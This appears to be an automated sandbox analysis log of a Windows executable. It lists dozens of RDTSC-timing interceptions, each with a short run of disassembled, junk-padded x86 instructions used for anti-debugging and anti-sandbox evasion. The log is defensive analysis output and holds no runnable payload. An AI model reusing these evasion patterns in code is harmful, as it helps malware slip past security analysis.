      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 9FF08D second address: 9FF0AF instructions: 0x00000000 rdtsc 0x00000002 ja 00007F9984B08D06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 pushad 0x00000011 push ecx 0x00000012 jl 00007F9984B08D06h 0x00000018 pop ecx 0x00000019 pushad 0x0000001a jng 00007F9984B08D06h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 9FF0AF second address: 9FF0CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 jnc 00007F998484EB0Ch 0x0000000e pushad 0x0000000f push eax 0x00000010 pop eax 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push ecx 0x0000001b pushad 0x0000001c popad 0x0000001d pop ecx 0x0000001e rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 9FF37E second address: 9FF39E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F9984B08D16h 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 9C2F3C second address: 9C2F76 instructions: 0x00000000 rdtsc 0x00000002 je 00007F998484EB06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 pop eax 0x00000011 popad 0x00000012 push edi 0x00000013 jns 00007F998484EB06h 0x00000019 pop edi 0x0000001a jmp 00007F998484EB19h 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 9C2F76 second address: 9C2F7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 9C2F7A second address: 9C2F7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: 9C2F7E second address: 9C2F8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F9984B08D0Bh 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A06B58 second address: A06B5D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A06B5D second address: A06B72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F9984B08D06h 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f ja 00007F9984B08D06h 0x00000015 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A06FD2 second address: A06FE6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F998484EB0Eh 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A06FE6 second address: A06FF9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9984B08D0Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A0758F second address: A07593 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A07593 second address: A0759B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A09C3A second address: A09C3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A09C3E second address: A09C65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 xor dword ptr [esp], 374D4BC1h 0x0000000d call 00007F9984B08D09h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push edx 0x00000016 pop edx 0x00000017 jmp 00007F9984B08D0Bh 0x0000001c popad 0x0000001d rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A09C65 second address: A09C94 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F998484EB0Fh 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F998484EB17h 0x00000013 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A09C94 second address: A09CCC instructions: 0x00000000 rdtsc 0x00000002 jc 00007F9984B08D0Ch 0x00000008 ja 00007F9984B08D06h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 ja 00007F9984B08D1Dh 0x0000001a mov eax, dword ptr [eax] 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A09CCC second address: A09CD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A09CD3 second address: A09CF5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9984B08D15h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A09CF5 second address: A09CFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A09CFA second address: A09CFF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A0A024 second address: A0A037 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F998484EB0Fh 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A0A037 second address: A0A03B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A0A875 second address: A0A879 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A0A8AD second address: A0A8B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A0A8B2 second address: A0A8BC instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F998484EB0Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A0A953 second address: A0A958 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A0A958 second address: A0A95E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A0A95E second address: A0A962 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A0AADC second address: A0AAE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A0AD4E second address: A0AD52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A0AD52 second address: A0AD58 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A0C99B second address: A0C9A0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A0D3FF second address: A0D418 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F998484EB0Eh 0x00000010 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A0D418 second address: A0D41E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A0D41E second address: A0D422 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A11A6A second address: A11A6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A11A6E second address: A11A8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F998484EB18h 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A11A8A second address: A11ADD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9984B08D17h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e mov si, 7700h 0x00000012 push 00000000h 0x00000014 add dword ptr [ebp+122D291Eh], esi 0x0000001a push 00000000h 0x0000001c mov dword ptr [ebp+122D25B1h], esi 0x00000022 xchg eax, ebx 0x00000023 jmp 00007F9984B08D18h 0x00000028 push eax 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c push ecx 0x0000002d pop ecx 0x0000002e rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A162A2 second address: A162A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A171EB second address: A171FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 jl 00007F9984B08D0Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A17385 second address: A173A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F998484EB19h 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A1839D second address: A183A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A173A2 second address: A173B1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A19232 second address: A19236 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A183A3 second address: A183A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A173B1 second address: A173B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A19236 second address: A19296 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007F998484EB08h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 00000017h 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 call 00007F998484EB0Ah 0x0000002b mov dword ptr [ebp+122D1ED8h], edx 0x00000031 pop ebx 0x00000032 and di, B561h 0x00000037 push 00000000h 0x00000039 push edi 0x0000003a mov dword ptr [ebp+1244FCACh], ebx 0x00000040 pop edi 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 push edx 0x00000045 jmp 00007F998484EB10h 0x0000004a pop edx 0x0000004b rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A183A8 second address: A183B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F9984B08D06h 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A173B7 second address: A173BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A183B2 second address: A18457 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F9984B08D0Fh 0x0000000e nop 0x0000000f xor edi, 16A3F060h 0x00000015 push dword ptr fs:[00000000h] 0x0000001c add edi, dword ptr [ebp+122D2B54h] 0x00000022 mov dword ptr fs:[00000000h], esp 0x00000029 movsx ebx, cx 0x0000002c mov eax, dword ptr [ebp+122D00A9h] 0x00000032 push 00000000h 0x00000034 push ecx 0x00000035 call 00007F9984B08D08h 0x0000003a pop ecx 0x0000003b mov dword ptr [esp+04h], ecx 0x0000003f add dword ptr [esp+04h], 00000017h 0x00000047 inc ecx 0x00000048 push ecx 0x00000049 ret 0x0000004a pop ecx 0x0000004b ret 0x0000004c mov edi, 2B1730EDh 0x00000051 jmp 00007F9984B08D0Bh 0x00000056 push FFFFFFFFh 0x00000058 push 00000000h 0x0000005a push ebx 0x0000005b call 00007F9984B08D08h 0x00000060 pop ebx 0x00000061 mov dword ptr [esp+04h], ebx 0x00000065 add dword ptr [esp+04h], 00000017h 0x0000006d inc ebx 0x0000006e push ebx 0x0000006f ret 0x00000070 pop ebx 0x00000071 ret 0x00000072 jmp 00007F9984B08D0Eh 0x00000077 push eax 0x00000078 push eax 0x00000079 push edx 0x0000007a jno 00007F9984B08D08h 0x00000080 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A1A3A1 second address: A1A3A7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A1A3A7 second address: A1A3AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A1B3B3 second address: A1B3B9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A1C3DC second address: A1C3ED instructions: 0x00000000 rdtsc 0x00000002 ja 00007F9984B08D08h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A1B3B9 second address: A1B3C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F998484EB06h 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A1A4CC second address: A1A4D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A1F335 second address: A1F339 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A1F339 second address: A1F33F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A1F33F second address: A1F349 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F998484EB0Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A1F349 second address: A1F3C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F9984B08D0Fh 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007F9984B08D08h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 00000014h 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 mov dword ptr [ebp+122D248Dh], ebx 0x0000002d push 00000000h 0x0000002f or dword ptr [ebp+12450314h], ecx 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push edx 0x0000003a call 00007F9984B08D08h 0x0000003f pop edx 0x00000040 mov dword ptr [esp+04h], edx 0x00000044 add dword ptr [esp+04h], 00000016h 0x0000004c inc edx 0x0000004d push edx 0x0000004e ret 0x0000004f pop edx 0x00000050 ret 0x00000051 add dword ptr [ebp+122D1E64h], ecx 0x00000057 mov dword ptr [ebp+122DB82Fh], ebx 0x0000005d xchg eax, esi 0x0000005e push eax 0x0000005f push edx 0x00000060 jmp 00007F9984B08D0Bh 0x00000065 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A1F3C4 second address: A1F3EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F998484EB0Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F998484EB0Fh 0x00000013 popad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A1F3EF second address: A1F3F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A1F572 second address: A1F577 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A214A3 second address: A214A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A214A8 second address: A214AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A214AE second address: A21505 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007F9984B08D08h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 00000014h 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 or dword ptr [ebp+1244FB54h], eax 0x0000002a mov dword ptr [ebp+122D1E58h], ecx 0x00000030 push 00000000h 0x00000032 mov dword ptr [ebp+12462344h], esi 0x00000038 push eax 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c jmp 00007F9984B08D12h 0x00000041 jp 00007F9984B08D06h 0x00000047 popad 0x00000048 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A21505 second address: A2150F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F998484EB06h 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A2067A second address: A20693 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9984B08D15h 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A22443 second address: A22449 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A22449 second address: A2244D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A2244D second address: A22451 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A22451 second address: A224A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007F9984B08D08h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 0000001Dh 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 push 00000000h 0x00000027 jp 00007F9984B08D0Eh 0x0000002d jnc 00007F9984B08D0Ch 0x00000033 push 00000000h 0x00000035 mov bx, dx 0x00000038 xchg eax, esi 0x00000039 push eax 0x0000003a push edx 0x0000003b push edi 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A224A8 second address: A224AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A224AD second address: A224CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9984B08D12h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jno 00007F9984B08D06h 0x00000013 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A24D03 second address: A24D07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A24D07 second address: A24D87 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007F9984B08D0Fh 0x0000000c pop edi 0x0000000d popad 0x0000000e mov dword ptr [esp], eax 0x00000011 sub bx, C267h 0x00000016 push 00000000h 0x00000018 sub dword ptr [ebp+1245522Ah], ecx 0x0000001e push 00000000h 0x00000020 call 00007F9984B08D18h 0x00000025 add edi, dword ptr [ebp+122D2C40h] 0x0000002b pop edi 0x0000002c xchg eax, esi 0x0000002d pushad 0x0000002e jmp 00007F9984B08D13h 0x00000033 pushad 0x00000034 jp 00007F9984B08D06h 0x0000003a jmp 00007F9984B08D0Ch 0x0000003f popad 0x00000040 popad 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007F9984B08D0Ah 0x00000049 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A24D87 second address: A24D97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F998484EB0Ch 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A25CAC second address: A25CB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A25CB0 second address: A25CC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 je 00007F998484EB06h 0x00000016 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A25CC6 second address: A25D24 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9984B08D17h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e jg 00007F9984B08D09h 0x00000014 popad 0x00000015 push 00000000h 0x00000017 mov ebx, dword ptr [ebp+122D2B48h] 0x0000001d push 00000000h 0x0000001f push 00000000h 0x00000021 push esi 0x00000022 call 00007F9984B08D08h 0x00000027 pop esi 0x00000028 mov dword ptr [esp+04h], esi 0x0000002c add dword ptr [esp+04h], 00000015h 0x00000034 inc esi 0x00000035 push esi 0x00000036 ret 0x00000037 pop esi 0x00000038 ret 0x00000039 mov edi, dword ptr [ebp+122D25CAh] 0x0000003f push eax 0x00000040 push eax 0x00000041 push edx 0x00000042 push edx 0x00000043 push edx 0x00000044 pop edx 0x00000045 pop edx 0x00000046 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A24F9F second address: A24FAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop eax 0x00000006 push eax 0x00000007 ja 00007F998484EB10h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
      Source: C:\Users\user\Desktop\random(3).exeRDTSC instruction interceptor: First address: A26D43 second address: A26D5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F9984B08D0Ch 0x00000010 rdtsc
